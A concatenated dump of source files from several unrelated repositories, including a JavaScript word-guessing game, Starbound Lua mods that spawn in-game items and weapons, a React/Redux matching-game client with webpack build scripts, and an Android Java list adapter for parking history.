subtitle: { color: "white", fontSize: 24, fontWeight: "600" },
});
|
011fed2734551e81eaa7acd7b3f3d1e6e21ad8a8
|
[
"JavaScript"
] | 1
|
JavaScript
|
hyun-jip/zivi_weather
|
9f85ac4783c1a0ee0053153a2f46aa6afbd3f80b
|
0afd89042de50a4e29859c3b3efd632d15e1edb6
|
refs/heads/main
|
<file_sep>player1name=localStorage.getItem("player1name");
player2name=localStorage.getItem("player2name");
player1score=0;
player2score=0;
qturn="player1";
answerturn="player2";
document.getElementById("player1name").innerHTML=player1name+" : ";
document.getElementById("player2name").innerHTML=player2name+" : ";
document.getElementById("player1score").innerHTML=player1score;
document.getElementById("player2score").innerHTML=player2score;
document.getElementById("playerq").innerHTML="Question turn- "+player1name;
document.getElementById("playerans").innerHTML="Answer turn- "+player2name;
function send(){
getword=document.getElementById("word").value;
word=getword.toLowerCase();
console.log("word in lowercase= "+word);
charAt1=word.charAt(1);
console.log(charAt1);
lengthdivide2=Math.floor(word.length/2);
charAt2=word.charAt(lengthdivide2);
console.log(charAt2);
lengthminus1=word.length-1;
charAt3=word.charAt(lengthminus1);
console.log(charAt3);
remove1=word.replace(charAt1,"_");
remove2=remove1.replace(charAt2,"_");
remove3=remove2.replace(charAt3,"_");
console.log(remove3);
qword="<h4 id='worddisplay'>Q. "+remove3+"</h4>";
input="<br>Answer : <input type='text'i id='checkbox'>";
checkbutton="<br><br><button class='btn btn-info' onclick='check()'>Check</button>";
row=qword+input+checkbutton;
document.getElementById("output").innerHTML=row;
document.getElementById("word").value="";
}
function check()
{
getans=document.getElementById("checkbox").value;
ans=getans.toLowerCase();
console.log("answer in lowercase - "+ans);
if(ans==word){
if(answerturn=="player1"){
player1score=player1score+1;
document.getElementById("player1score").innerHTML=player1score;
}
else{
player2score=player2score+1;
document.getElementById("player2score").innerHTML=player2score;
}
}
if(qturn=="player1"){
qturn="player2"
document.getElementById("playerq").innerHTML="Question turn - "+player2name;
}
else{
qturn="player1"
document.getElementById("playerq").innerHTML="Question turn - "+player1name;
}
if(answerturn=="player1"){
answerturn="player2"
document.getElementById("playerans").innerHTML="Answer turn - "+player2name;
}
else{
answerturn="player1"
document.getElementById("playerans").innerHTML="Answer turn - "+player1name;
}
document.getElementById("output").innerHTML="";
}
|
a2f6ec8e6e2161928715c738aa15032d379b8c58
|
[
"JavaScript"
] | 1
|
JavaScript
|
SSD2009/Guessthe-word
|
a21286a654dee2c4a38019c58f2bd5317afdfaf1
|
dc99595af73ba34b50f9cc957490f490d845eaf7
|
refs/heads/master
|
<repo_name>Tomiaz/kinesivan-starbound-mods<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/randomweapons.lua
-- Randomized weapon script
function randomweapons(panel)
self.weaponRarity = "common"
self.weaponLevel = 1
self.weaponClass = "assaultrifle"
self.guntext = ""
self.slider = Slider(75, 50, 120, 8, 1, 10, 1)
local h = panel.height
local pad = 5
local pad2 = 14
local padtop = 170
local buttonH = 12
local buttonW = 85
local buttonPad1 = 35
local buttonPad2 = 150
self.label = Label(pad, pad, "", 8)
local labelHead1 = Label(58, 185, "Gun Types", 8, "orange")
local labelHead2 = Label(170, 185, "Gun Rarity", 8, "orange")
self.labelHead3 = Label(112, 60, self.guntext, 8, "orange")
-- Buttons for weapon classes.
-- Button 1
local classButton1 = TextButton(buttonPad1, padtop, buttonW, buttonH, "Assault Rifle")
classButton1.onClick = function()
self.weaponClass = "assaultrifle"
end
-- Button 2
local classButton2 = TextButton(buttonPad1, padtop - pad2, buttonW, buttonH, "Grenade Launcher")
classButton2.onClick = function()
self.weaponClass = "grenadelauncher"
end
-- Button 3
local classButton3 = TextButton(buttonPad1, padtop - pad2 * 2, buttonW, buttonH, "Machine Pistol")
classButton3.onClick = function()
self.weaponClass = "machinepistol"
end
-- Button 4
local classButton4 = TextButton(buttonPad1, padtop - pad2 * 3, buttonW, buttonH, "Pistol")
classButton4.onClick = function()
self.weaponClass = "pistol"
end
-- Button 5
local classButton5 = TextButton(buttonPad1, padtop - pad2 * 4, buttonW, buttonH, "Rocket Launcher")
classButton5.onClick = function()
self.weaponClass = "rocketlauncher"
end
-- Button 6
local classButton6 = TextButton(buttonPad1, padtop - pad2 * 5, buttonW, buttonH, "Shotgun")
classButton6.onClick = function()
self.weaponClass = "shotgun"
end
-- Button 7
local classButton7 = TextButton(buttonPad1, padtop - pad2 * 6, buttonW, buttonH, "Sniper Rifle")
classButton7.onClick = function()
self.weaponClass = "sniperrifle"
end
-- Buttons for rarity levels
-- Button 1
local rarityButton1 = TextButton(buttonPad2, padtop, buttonW, buttonH, "Common")
rarityButton1.onClick = function()
self.weaponRarity = "common"
end
-- Button 2
local rarityButton2 = TextButton(buttonPad2, padtop - pad2, buttonW, buttonH, "Uncommon")
rarityButton2.onClick = function()
self.weaponRarity = "uncommon"
end
-- Button 3
local rarityButton3 = TextButton(buttonPad2, padtop - pad2 * 2, buttonW, buttonH, "Rare")
rarityButton3.onClick = function()
self.weaponRarity = "rare"
end
-- Button for spawning the weapon
local spawnButton = TextButton(180, pad, buttonW, buttonH, "Spawn weapon", "orange")
spawnButton.onClick = function()
self.weaponItem = self.weaponRarity .. self.weaponClass
world.spawnItem("generatedgun", world.entityPosition(smm.sourceId()), 1, {level = self.weaponLevel, definition = self.weaponItem})
end
-- Spawn all the UI elements
panel:add(classButton1)
panel:add(classButton2)
panel:add(classButton3)
panel:add(classButton4)
panel:add(classButton5)
panel:add(classButton6)
panel:add(classButton7)
panel:add(rarityButton1)
panel:add(rarityButton2)
panel:add(rarityButton3)
panel:add(self.slider)
panel:add(spawnButton)
panel:add(self.label)
panel:add(labelHead1)
panel:add(labelHead2)
panel:add(self.labelHead3)
return "Guns", {"Tags"}
end
function randomweaponsupdate()
self.weaponLevel = self.slider.value
self.labelText = "Gun type: " .. self.weaponClass .. "\nGun rarity: " .. self.weaponRarity .. "\nGun level: " .. self.weaponLevel
self.label.text = self.labelText
self.gunText = "Gun level (" .. self.weaponLevel .. ")"
self.labelHead3.text = self.gunText
end
smm(randomweapons, randomweaponsupdate)
<file_sep>/CreativeMode/objects/wired/scriptbox/scriptbox.lua
function init(virtual)
if not virtual then
storage.consoleStorage = storage.consoleStorage or {}
entity.setInteractive(true)
end
end
function onConsoleStorageRecieve(consoleStorage)
storage.consoleStorage = consoleStorage
end
function onInteraction(args)
local interactionConfig = entity.configParameter("interactionConfig")
local mods = entity.configParameter("mods")
interactionConfig.scriptStorage = storage.consoleStorage
for _,modScript in ipairs(mods) do
table.insert(interactionConfig.scripts, modScript)
end
interactionConfig.interactSource = args.source
interactionConfig.interactSourceId = args.sourceId
return {"ScriptConsole", interactionConfig}
end
<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/samplescript.lua
-- Sample SMM script
function samplescript(panel)
local h = panel.height
local pad = 5
local buttonH = 12
local button = TextButton(pad, h - pad - buttonH, 100, buttonH, "Spawn Item")
button.onClick = function()
world.spawnItem("torch", world.entityPosition(smm.sourceId()))
end
local sliderH = 8
local slider = Slider(pad, button.y - pad - sliderH, 100, sliderH, 0, 100, 1)
local label = Label(slider.x + slider.width + pad, slider.y, "", sliderH)
label:bind("text", Binding.concat(
"Sample Slider: ", Binding(slider, "value")))
panel:add(button)
panel:add(slider)
panel:add(label)
return "Sample Mod", {"Tags"}
end
smm(samplescript)
<file_sep>/CreativeMode/objects/wired/ironbeacon/duplicatortest.lua
function init(args)
self.weaponType = "generatedgun"
self.weaponLevel = 10
self.weaponRarity = "common"
self.weaponClass = "assaultrifle"
entity.setInteractive(true)
end
function onInteraction(args)
local weaponItem = self.weaponRarity .. self.weaponClass
world.spawnItem(self.weaponType, entity.toAbsolutePosition({ 0.0, 5.0 }), 1, {level = self.weaponLevel, definition = weaponItem})
end<file_sep>/CreativeMode/objects/wired/ironbeacon/duplicator100.lua
function init(args)
entity.setInteractive(true)
end
function onInteraction(args)
local heldItem = world.entityHandItem(args.sourceId, "primary")
world.spawnItem(heldItem, entity.toAbsolutePosition({ 0.0, 5.0 }), 100)
end<file_sep>/CreativeMode/objects/wired/scriptbox/smmconsole.lua
smm = {
mods = {},
updateFunctions = {}
}
setmetatable(
smm,
{
__call = function(t, ...)
local args = table.pack(...)
assert(type(args[1]) == "function",
"The first argument must be your panel init function")
table.insert(t.mods, args[1])
if args[2] then
table.insert(t.updateFunctions, args[2])
end
end
}
)
function init()
storage = console.configParameter("scriptStorage")
local source = console.configParameter("interactSource")
local sourceId = console.configParameter("interactSourceId")
smm.source = function()
return {source[1], source[2]}
end
smm.sourceId = function()
return sourceId
end
local guiConfig = console.configParameter("gui")
local canvasRect = guiConfig.scriptCanvas.rect
local width = canvasRect[3] - canvasRect[1]
local height = canvasRect[4] - canvasRect[2]
local padding = 5
local fontSize = 14
local modList = List(padding, padding, 100, height - 8, fontSize)
modList.backgroundColor = "#635d32"
modList.borderColor = "black"
local modPanelX = modList.x + modList.width + padding
local modPanelY = modList.y
local modPanelWidth = width - modPanelX - padding
local modPanelHeight = height - modPanelY - padding
local modPanelRectSize = 2
local modPanelRect = Rectangle(modPanelX - modPanelRectSize,
modPanelY - modPanelRectSize,
modPanelWidth + modPanelRectSize * 2,
modPanelHeight + modPanelRectSize * 2,
"black", modPanelRectSize)
for k,v in ipairs(smm.mods) do
local modPanel = Panel(modPanelX, modPanelY)
modPanel.width = modPanelWidth
modPanel.height = modPanelHeight
local modName, modTags = v(modPanel)
assert(type(modName) == "string",
"Your init function must return your mod name.")
local modButton = modList:emplaceItem(modName)
modButton.modTags = modTags
modButton.borderColor = "black"
modButton.bordercolor = "gray"
modButton.backgroundColor = "#1f1f1f"
modPanel:bind("visible", Binding(modButton, "selected"))
GUI.add(modPanel)
end
GUI.add(modList)
GUI.add(modPanelRect)
table.sort(
modList.items,
function(a, b)
return a.text < b.text
end
)
end
function syncStorage()
world.callScriptedEntity(console.sourceEntity(), "onConsoleStorageRecieve", storage)
end
function update(dt)
GUI.step(dt)
for _,updateFunction in ipairs(smm.updateFunctions) do
updateFunction(dt)
end
end
function canvasClickEvent(position, button, pressed)
GUI.clickEvent(position, button, pressed)
end
function canvasKeyEvent(key, isKeyDown)
GUI.keyEvent(key, isKeyDown)
end
<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/miscweapons.lua
-- Randomized weapon script
function miscweapons(panel)
self.miscLevel = 1
self.miscClass = "avianblaster"
self.miscText = ""
self.miscSlider = Slider(75, 50, 120, 8, 1, 10, 1)
local h = panel.height
local pad = 5
local pad2 = 14
local padtop = 170
local buttonH = 12
local buttonW = 85
local buttonPad1 = 5
local buttonPad2 = 95
local buttonPad3 = 185
self.miscLabel = Label(pad, pad, "", 8)
local misclabelHead2 = Label(120, 185, "Gun Type", 8, "orange")
self.misclabelHead3 = Label(112, 60, self.miscText, 8, "orange")
-- Buttons for weapon classes (row 1).
-- Button 1
local classButtonM1 = TextButton(buttonPad1, padtop, buttonW, buttonH, "Avian Blaster")
classButtonM1.onClick = function()
self.miscClass = "avianblaster"
end
-- Button 2
local classButtonM2 = TextButton(buttonPad1, padtop - pad2, buttonW, buttonH, "Avian Heavy Blaster")
classButtonM2.onClick = function()
self.miscClass = "avianheavyblaster"
end
-- Button 3
local classButtonM3 = TextButton(buttonPad1, padtop - pad2 * 2, buttonW, buttonH, "Bone Rifle")
classButtonM3.onClick = function()
self.miscClass = "boneassault"
end
-- Button 4
local classButtonM4 = TextButton(buttonPad1, padtop - pad2 * 3, buttonW, buttonH, "Bone Pistol")
classButtonM4.onClick = function()
self.miscClass = "bonepistol"
end
-- Button 5
local classButtonM5 = TextButton(buttonPad1, padtop - pad2 * 4, buttonW, buttonH, "Bone Shotgun")
classButtonM5.onClick = function()
self.miscClass = "boneshotgun"
end
-- Button 6
local classButtonM6 = TextButton(buttonPad1, padtop - pad2 * 5, buttonW, buttonH, "Cell Zapper")
classButtonM6.onClick = function()
self.miscClass = "cellzapper"
end
-- Button 7
local classButtonM7 = TextButton(buttonPad1, padtop - pad2 * 6, buttonW, buttonH, "Crossbow")
classButtonM7.onClick = function()
self.miscClass = "crossbow"
end
-- Buttons for weapon classes (row 2).
-- Button 1
local classButtonM8 = TextButton(buttonPad2, padtop, buttonW, buttonH, "Crossbow - Special")
classButtonM8.onClick = function()
self.miscClass = "crossbowspecial"
end
-- Button 2
local classButtonM9 = TextButton(buttonPad2, padtop - pad2, buttonW, buttonH, "Crossbow - Wood")
classButtonM9.onClick = function()
self.miscClass = "crossbowwood"
end
-- Button 3
local classButtonM10 = TextButton(buttonPad2, padtop - pad2 * 2, buttonW, buttonH, "Flamethrower")
classButtonM10.onClick = function()
self.miscClass = "flamethrower"
end
-- Button 4
local classButtonM11 = TextButton(buttonPad2, padtop - pad2 * 3, buttonW, buttonH, "Floran Gren. Launcher")
classButtonM11.onClick = function()
self.miscClass = "florangrenadelauncher"
end
-- Button 5
local classButtonM12 = TextButton(buttonPad2, padtop - pad2 * 4, buttonW, buttonH, "Floran Needler")
classButtonM12.onClick = function()
self.miscClass = "floranneedler"
end
-- Button 6
local classButtonM13 = TextButton(buttonPad2, padtop - pad2 * 5, buttonW, buttonH, "Globe Launcher")
classButtonM13.onClick = function()
self.miscClass = "globelauncher"
end
-- Button 7
local classButtonM14 = TextButton(buttonPad2, padtop - pad2 * 6, buttonW, buttonH, "Lightning Coil")
classButtonM14.onClick = function()
self.miscClass = "lightningcoil"
end
-- Buttons for weapon classes (row 3)
-- Button 1
local classButtonM15 = TextButton(buttonPad3, padtop, buttonW, buttonH, "Revolver")
classButtonM15.onClick = function()
self.miscClass = "revolver"
end
-- Button 2
local classButtonM16 = TextButton(buttonPad3, padtop - pad2, buttonW, buttonH, "Shatter Gun")
classButtonM16.onClick = function()
self.miscClass = "shattergun"
end
-- Button 3
local classButtonM17 = TextButton(buttonPad3, padtop - pad2 * 2, buttonW, buttonH, "Stinger Gun")
classButtonM17.onClick = function()
self.miscClass = "stingergun"
end
-- Button 4
local classButtonM18 = TextButton(buttonPad3, padtop - pad2 * 3, buttonW, buttonH, "Uzi")
classButtonM18.onClick = function()
self.miscClass = "uzi"
end
-- Button for spawning the weapon
local spawnButton3 = TextButton(180, pad, buttonW, buttonH, "Spawn weapon", "orange")
spawnButton3.onClick = function()
world.spawnItem("generatedgun", world.entityPosition(smm.sourceId()), 1, {level = self.miscLevel, definition = self.miscClass})
end
-- Spawn all the UI elements
panel:add(classButtonM1)
panel:add(classButtonM2)
panel:add(classButtonM3)
panel:add(classButtonM4)
panel:add(classButtonM5)
panel:add(classButtonM6)
panel:add(classButtonM7)
panel:add(classButtonM8)
panel:add(classButtonM9)
panel:add(classButtonM10)
panel:add(classButtonM11)
panel:add(classButtonM12)
panel:add(classButtonM13)
panel:add(classButtonM14)
panel:add(classButtonM15)
panel:add(classButtonM16)
panel:add(classButtonM17)
panel:add(classButtonM18)
panel:add(self.miscSlider)
panel:add(spawnButton3)
panel:add(self.miscLabel)
panel:add(misclabelHead2)
panel:add(self.misclabelHead3)
return "Misc. Guns", {"Tags"}
end
function miscweaponsupdate()
self.miscLevel = self.miscSlider.value
self.misclabelText = "Gun type: " .. self.miscClass .. "\nGun level: " .. self.miscLevel
self.miscLabel.text = self.misclabelText
self.miscText = "Gun level (" .. self.miscLevel .. ")"
self.misclabelHead3.text = self.miscText
end
smm(miscweapons, miscweaponsupdate)
|
0a4c92783be69c40e55927bbf34b393a93bbca6e
|
[
"Lua"
] | 7
|
Lua
|
Tomiaz/kinesivan-starbound-mods
|
e8337a70cc3d91b014316b1163ae70bbf65a7061
|
0c4f11a60a063fb4bbf04b5657e27c12f70a9f5b
|
refs/heads/master
|
<file_sep>import * as types from './types';
import { getStreams, getHasPlayed, getIsFirstItem, getIsLastItem } from '../reducers';
// Sockets config
const SOCKETS_HOST = `ws://${window.location.hostname}`;
const SOCKETS_PORT = 8000;
const SOCKETS_ENDPOINTS = ['/stream/1', '/stream/2'];
let sockets;
// Action types
export const ActionTypes = types;
// Helper
const doStreamsMatch = state =>
getStreams(state).reduce((prev, current) =>
current.color && current.number &&
prev.color === current.color && prev.number === current.number
);
// Action creators
export const checkMatch = () => (dispatch, getState) => {
// Ignore if user already played in this turn
if (getHasPlayed(getState())) return;
dispatch({
type: doStreamsMatch(getState()) ?
ActionTypes.UPDATE_SCORE_UP :
ActionTypes.UPDATE_SCORE_DOWN,
});
};
export const newStreamValue = (id, value) => (dispatch, getState) => {
// Took points away if there was a match and user didn't notice it
if (!getHasPlayed(getState()) && doStreamsMatch(getState())) {
dispatch({
type: ActionTypes.UPDATE_SCORE_DOWN,
});
}
dispatch({
type: ActionTypes.UPDATE_STREAM_VALUE,
id,
value,
});
};
export const goToHistoryPrev = () => (dispatch, getState) => {
if (getIsFirstItem(getState())) return;
dispatch({
type: ActionTypes.GO_TO_HISTORY_PREV,
});
};
export const goToHistoryNext = () => (dispatch, getState) => {
if (getIsLastItem(getState())) return;
dispatch({
type: ActionTypes.GO_TO_HISTORY_NEXT,
});
};
export const startGame = () => dispatch => {
sockets = SOCKETS_ENDPOINTS.map(endpoint =>
new WebSocket(`${SOCKETS_HOST}:${SOCKETS_PORT}${endpoint}`)
);
sockets.forEach((socket, index) => {
socket.onmessage = ({ data }) => {
dispatch(newStreamValue(index + 1, JSON.parse(data)));
};
});
dispatch({
type: ActionTypes.START_GAME,
});
};
export const endGame = () => dispatch => {
dispatch({
type: ActionTypes.STOP_GAME,
});
sockets.forEach(socket => {
socket.close();
});
};
<file_sep>const webpack = require('webpack');
const HtmlWebpackPlugin = require('html-webpack-plugin');
const ExtractTextPlugin = require('extract-text-webpack-plugin');
const StyleLintPlugin = require('stylelint-webpack-plugin');
const WebpackNotifierPlugin = require('webpack-notifier');
const autoprefixer = require('autoprefixer');
const path = require('path');
const getPlugins = env => {
const GLOBALS = {
'process.env.NODE_ENV': JSON.stringify(env),
__DEV__: env === 'development',
};
const htmlWebpackPluginOpts = {
template: 'index.html',
favicon: 'favicon.png',
xhtml: true,
};
const plugins = [
new webpack.optimize.OccurenceOrderPlugin(),
new webpack.DefinePlugin(GLOBALS),
new HtmlWebpackPlugin(htmlWebpackPluginOpts),
new ExtractTextPlugin('styles.css'),
];
if (env === 'development') {
plugins.push(
new webpack.HotModuleReplacementPlugin(),
new webpack.NoErrorsPlugin(),
new WebpackNotifierPlugin({ excludeWarnings: true }),
new StyleLintPlugin()
);
} else {
plugins.push(
new webpack.optimize.DedupePlugin(),
new webpack.optimize.UglifyJsPlugin({ minimize: true, sourceMap: false })
);
}
return plugins;
};
const getLoaders = env => {
const cssLoadersObj = env === 'development' ?
{ test: /\.css$/, loaders: ['style', 'css?sourceMap', 'postcss'] } :
{ test: /\.css$/, loader: ExtractTextPlugin.extract(['css', 'postcss']) };
const scssLoadersObj = env === 'development' ?
{ test: /\.scss$/, loaders: ['style', 'css', 'postcss', 'sass?sourceMap'] } :
{ test: /\.scss$/, loader: ExtractTextPlugin.extract(['css', 'postcss', 'sass']) };
const imageLoaders = ['url?limit=10000'];
if (env === 'production') {
imageLoaders.push(
'image-webpack?{ optimizationLevel: 7, progressive: true, pngquant: { quality: "65-90" } }'
);
}
return [
{
test: /\.js?$/,
exclude: /node_modules/,
loaders: ['react-hot', 'babel?compact=true&comments=false', 'eslint'],
},
cssLoadersObj,
scssLoadersObj,
{
test: /\.(jpe?g|png|gif|svg)$/,
loaders: imageLoaders,
},
{
test: /\.(eot(\?v=\d+\.\d+\.\d+)?|ttf(\?v=\d+\.\d+\.\d+)?|otf|woff(2)*)$/,
loader: 'url?limit=10000',
},
{
test: /\.html?$/,
loader: 'html',
},
];
};
const getEntry = env => {
const entry = [];
if (env === 'development') {
entry.push(
'webpack-hot-middleware/client?reload=true',
'webpack/hot/only-dev-server'
);
}
entry.push(
'babel-polyfill',
'./index'
);
return entry;
};
module.exports = env => (
{
context: path.join(__dirname, './src'),
debug: true,
devtool: env === 'development' ? 'eval-source-map' : 'source-map',
noInfo: true,
entry: getEntry(env),
output: {
path: path.join(__dirname, './dist'),
publicPath: '/',
filename: 'scripts.js',
},
plugins: getPlugins(env),
module: {
loaders: getLoaders(env),
},
postcss: [autoprefixer({ browsers: ['last 2 versions'] })],
resolve: {
extensions: ['', '.js'],
},
}
);
<file_sep>import { ActionTypes } from '../actions';
// Reducers
const initialState = 0;
const currentIndex = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.START_GAME:
case ActionTypes.STOP_GAME:
return initialState;
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
case ActionTypes.GO_TO_HISTORY_NEXT:
return state + 1;
case ActionTypes.GO_TO_HISTORY_PREV:
return state - 1;
default:
return state;
}
};
export default currentIndex;
// Selectors
export const getCurrentIndex = state => state;
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router';
import { getHasPlayed } from '../reducers';
import * as actions from '../actions';
const PlayControls = ({ hasPlayed, checkMatch }) => (
<div className="controls">
<button
className="button button--primary"
type="button"
onClick={checkMatch}
disabled={hasPlayed}
>
I see a match
</button>
<Link
className="button button--secondary"
to="/replay"
>
End game
</Link>
</div>
);
PlayControls.propTypes = {
hasPlayed: PropTypes.bool.isRequired,
checkMatch: PropTypes.func.isRequired,
};
const mapStateToProps = state => ({
hasPlayed: getHasPlayed(state),
});
export default connect(
mapStateToProps,
actions
)(PlayControls);
<file_sep>const webpack = require('webpack');
const webpackConfig = require('../webpack.config')('production');
require('colors');
process.env.NODE_ENV = 'production';
webpack(webpackConfig).run((err, stats) => {
console.log('Generating minified bundle for production.'.bold.blue);
if (err) {
console.log(err.bold.red);
return 1;
}
const jsonStats = stats.toJson();
if (jsonStats.hasErrors) return jsonStats.errors.map(error => console.log(error.red));
if (jsonStats.hasWarnings) {
console.log('Webpack warnings: '.bold.yellow);
jsonStats.warnings.map(warning => console.log(warning.yellow));
}
console.log('Done. Site ready in dist folder.'.green.bold);
return 0;
});
<file_sep>import React, { PropTypes } from 'react';
import { Link } from 'react-router';
const NotFound = () => (
<div className="error">
<div className="error__text">
<h1>Not found.</h1>
<p>The URL doesn't exist.</p>
</div>
<Link
className="button button--secondary"
to="/"
>
Go home
</Link>
</div>
);
NotFound.propTypes = {
title: PropTypes.string.isRequired,
description: PropTypes.string.isRequired,
};
export default NotFound;
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { getStreams } from '../reducers';
import GameboardStreamsItem from './GameboardStreamsItem';
const GameboardStreams = ({ items }) => (
<div className="gameboard__streams">
{items.map((item, index) =>
<GameboardStreamsItem
key={index}
{...item}
/>
)}
</div>
);
GameboardStreams.propTypes = {
items: PropTypes.arrayOf(PropTypes.shape({
id: PropTypes.number,
number: PropTypes.number,
color: PropTypes.string,
})).isRequired,
};
const mapStateToProps = state => ({
items: getStreams(state),
});
export default connect(
mapStateToProps
)(GameboardStreams);
<file_sep>const browserSync = require('browser-sync');
const webpack = require('webpack');
const webpackDevMiddleware = require('webpack-dev-middleware');
const webpackHotMiddleware = require('webpack-hot-middleware');
const historyApiFallback = require('connect-history-api-fallback');
const webpackConfig = require('../webpack.config')('development');
const bundler = webpack(webpackConfig);
browserSync({
server: {
baseDir: 'src',
middleware: [
historyApiFallback(),
webpackDevMiddleware(bundler, {
publicPath: webpackConfig.output.publicPath,
stats: {
colors: true,
hash: false, version: false, timings: false,
assets: false, chunks: false, children: false,
},
}),
webpackHotMiddleware(bundler),
],
},
files: [
'src/*.html',
],
notify: false,
ghostMode: false,
});
<file_sep>import React, { PropTypes } from 'react';
import GameboardStreamsItemProperty from './GameboardStreamsItemProperty';
const GameboardStreamsItem = ({ number, color }) => (
<ul className="gameboard__streams__item">
<GameboardStreamsItemProperty
type="number"
value={number}
/>
<GameboardStreamsItemProperty
type="color"
value={color}
/>
</ul>
);
GameboardStreamsItem.propTypes = {
number: PropTypes.number,
color: PropTypes.string,
};
export default GameboardStreamsItem;
<file_sep># Matchdux client
**Important**: Start the accompanying server `matchdux-server` before running this app.
## Install
You'll need to install [Node.js](http://nodejs.org) first if you don't have it. Then run the following command to install all project dependencies:
npm install
For development, installing the [Redux DevTools extension](https://github.com/zalmoxisus/redux-devtools-extension) in the browser is optional but highly recommended. The project is already set up to work with it.
## Run
To start the site in **development** mode (with file watching and hot reloading enabled):
npm start
To start the site in **production** mode:
npm run build:serve
The project uses [Browsersync](https://www.browsersync.io/), which allows opening the site on any device connected to the same local network, syncing action between devices, etc. Check its website for details.
## Build
Run the following command to get a production-ready build of the site in the `dist` folder (with minified files, inlined or optimized images, etc):
npm run build
<file_sep>import React from 'react';
import { Route, IndexRoute } from 'react-router';
import App from './components/App';
import Welcome from './components/Welcome';
import Play from './components/Play';
import Replay from './components/Replay';
import NotFound from './components/NotFound';
const routes = (
<Route path="/" component={App}>
<IndexRoute component={Welcome} />
<Route path="play" component={Play} />
<Route path="replay" component={Replay} />
<Route path="*" component={NotFound} />
</Route>
);
export default routes;
<file_sep>import { ActionTypes } from '../actions';
import streams, * as fromStreams from './streams';
import score, * as fromScore from './score';
// Reducers
const initialState = {};
const item = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.START_GAME:
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
return {
...state,
streams: streams(state.streams, action),
score: score(state.score, action),
};
default:
return state;
}
};
const items = (state = [], action) => {
switch (action.type) {
case ActionTypes.START_GAME:
return [
item(undefined, action),
];
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
return [
...state,
item(state[state.length - 1], action),
];
default:
return state;
}
};
export default items;
// Selectors
const getItem = (state, index) => state[index] || initialState;
export const getStreams = (state, index) => fromStreams.getStreams(getItem(state, index).streams);
export const getScore = (state, index) => fromScore.getScore(getItem(state, index).score);
export const getItemsLength = state => state.length;
<file_sep>import React, { Component, PropTypes } from 'react';
import { connect } from 'react-redux';
import * as actions from '../actions';
import Gameboard from './Gameboard';
import PlayControls from './PlayControls';
class Play extends Component {
componentDidMount() {
this.props.startGame();
}
componentWillUnmount() {
this.props.endGame();
}
render() {
return (
<div>
<Gameboard />
<PlayControls />
</div>
);
}
}
Play.propTypes = {
startGame: PropTypes.func.isRequired,
endGame: PropTypes.func.isRequired,
};
export default connect(
null,
actions
)(Play);
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { getScore } from '../reducers';
const GameboardScore = ({ value }) => (
<div className="gameboard__score">
<div className="gameboard__score__text">
{value}
</div>
</div>
);
GameboardScore.propTypes = {
value: PropTypes.number.isRequired,
};
const mapStateToProps = state => ({
value: getScore(state),
});
export default connect(
mapStateToProps
)(GameboardScore);
<file_sep>import { ActionTypes } from '../actions';
const POINTS_UNIT = 1;
// Reducers
const initialState = 0;
const score = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.UPDATE_SCORE_UP:
return state + POINTS_UNIT;
case ActionTypes.UPDATE_SCORE_DOWN:
return state - POINTS_UNIT;
default:
return state;
}
};
export default score;
// Selectors
export const getScore = state => state || initialState;
<file_sep>const browserSync = require('browser-sync');
browserSync({
server: {
baseDir: 'dist',
},
notify: false,
ghostMode: false,
});
<file_sep>import { combineReducers } from 'redux';
import history, * as fromHistory from './history';
import hasPlayed, * as fromHasPlayed from './hasPlayed';
const rootReducer = combineReducers({
history,
hasPlayed,
});
export default rootReducer;
export const getStreams = state => fromHistory.getStreams(state.history);
export const getScore = state => fromHistory.getScore(state.history);
export const getIsFirstItem = state => fromHistory.getIsFirstItem(state.history);
export const getIsLastItem = state => fromHistory.getIsLastItem(state.history);
export const getHasPlayed = state => fromHasPlayed.getHasPlayed(state.hasPlayed);
|
9f2433b9703fe6a3895c8f6e1f59c1e77f2ea5bc
|
[
"JavaScript",
"Markdown"
] | 17
|
JavaScript
|
soyguijarro/matchdux-client
|
529075d3e22b8707100b62b768f07c9bfb67d878
|
5791c84a8e2af8e452c1d2d8c1276f8126f68918
|
refs/heads/master
|
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import java.util.ArrayList;
public class HistoryAdapter extends RecyclerView.Adapter<HistoryAdapter.MyViewHolder> {
ArrayList<String> plat, date;
ArrayList<Boolean> status;
int[] status_images;
Context context;
public HistoryAdapter(Context ct, ArrayList<String> input_plat, ArrayList<String> input_date, ArrayList<Boolean> input_status, int[] input_img) {
context = ct;
plat = input_plat;
date = input_date;
status = input_status;
status_images = input_img;
}
@NonNull
@Override
public MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
LayoutInflater inflater = LayoutInflater.from(context);
View view = inflater.inflate(R.layout.history_row, parent, false);
return new MyViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull MyViewHolder holder, int position) {
holder.txtPlat.setText(plat.get(position));
holder.txtTime.setText(date.get(position));
Boolean status_ref = status.get(position);
if (status_ref) {
holder.imgStatus.setImageResource(status_images[0]);
} else {
holder.imgStatus.setImageResource(status_images[1]);
}
}
@Override
public int getItemCount() {
return date.size();
}
public class MyViewHolder extends RecyclerView.ViewHolder {
TextView txtPlat, txtTime;
ImageView imgStatus;
public MyViewHolder(@NonNull View itemView) {
super(itemView);
txtPlat = itemView.findViewById(R.id.plat_history);
txtTime = itemView.findViewById(R.id.time_history);
imgStatus = itemView.findViewById(R.id.status_history);
}
}
}
<file_sep>package com.eekrain.amikomparking;
import android.Manifest;
import android.content.Context;
import android.content.Intent;
